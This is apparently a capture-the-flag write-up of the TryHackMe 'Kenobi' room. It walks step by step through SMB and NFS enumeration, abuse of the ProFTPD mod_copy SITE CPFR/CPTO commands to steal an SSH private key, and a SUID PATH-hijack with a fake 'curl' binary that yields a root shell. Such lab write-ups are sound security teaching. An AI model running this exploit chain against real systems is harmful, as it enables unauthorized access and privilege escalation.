Kenobi (THM)

TryHackMe - Kenobi Write-Up

topics: enumerate Samba for shares, manipulate vulnerable version of proftpd, privesc with path var manipulation

1) Enumeration (nmap)

  • nmap -vvv: lists only all open ports

    • 7 open ports

      2.1) Enumerating Samba

  • Samba is the interoperability of Windows and Unix, often refered to as a network file system. It frequently uses Server Message Block protocol (SMB) that runs on port 445 and 139.

  • using nmaps default scripts, we can detect how many SMB shares (directories) the server is using

  • nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse __: returns 3 shares

  • smbclient: installed on most Linux machines, used to inspect smb shares

    • smbclient smb://ip/share: takes you to system, asks for password but hit ENTER, there is none. Simple ls shows there is a log.txt file located on the share.

    • SMB shares can be recursively downloaded to inspect the contents. smbget -R smb://ip/anonymous

    • mousepad log.txt shows that there is information generated for Kenobi's SSH user key and ProFTPD server

  • The most interesting find here is that remote procedure call (RPC) is open on port 111. It's a server that converts RPC program number into universal addresses. Once RPC starts it tells rpcbind the address where it is listening and the RPC program number it's serving. Access into the network file system.

  • nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount __: reveals mounted at /var

2) Obtain Access

  • to find which version ProFTPd is running, use netcat to listen on FTP port. nc

  • searchsploit can be used to find exploits on exploit-db.com for a particular software version

    • searchsploit proftpd __

    • the exploit mod_copy will be most appropriate. It implements the SITE CPFR and SITE CPTO commands, which are used to copy files & directories between paths on the server. An unauthenticated client can abuse these commands to copy files from any path to another.

  • following this, use the commands to copy the private key. We already know the /var directory was mounted so we move it to /var/tmp/id_rsa. SITE CPFR , SITE CPTO /var/tmp/id_rsa

  • mount the directory to our machine mkdir /mnt/kenobiNFS; mount :/var /mnt/kenobiNFS; ls

  • go to /var/tmp to get the key and login

cp /mnt/kenobiNFS/id_rsa .

chmod 600 id_rsa

ssh -i id_rsa kenobi@ip

3) root

  • SUID needs to be used by some binaries such as passwd (needs to reset password on system) but custom files with the SUID bit are dangerous and can be used to exploit privileges.

  • search for all SUID files find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null

    • /usr/bin/menu is unusual because menu is not a binary file

  • the strings command parses for human readable strings in a binary.

    • this returns curl -I localhost, uname -r, ifconfig which means the binary is running other binaries without a full path (not using /usr/bin/curl or /usr/bin/uname), because this file is SUID (e.g running with root privileges) the path can be manipulated to gain a root shell

  • copy the default shell /bin/sh and call it curl. Change permissions and put its location in the PATH. When the /usr/bin/menu binary runs, it will use our path variable to find the 'curl' binary which is actually /bin/sh because the file is run as root, so is our shell.

  • cd to /tmp

echo /bin/sh > curl

chmod 777 curl

export PATH=/tmp:$PATH

/usr/bin/menu

select 1

cat /root/root.txt

PreviousRootMe (THM)NextWgel (THM)

Last updated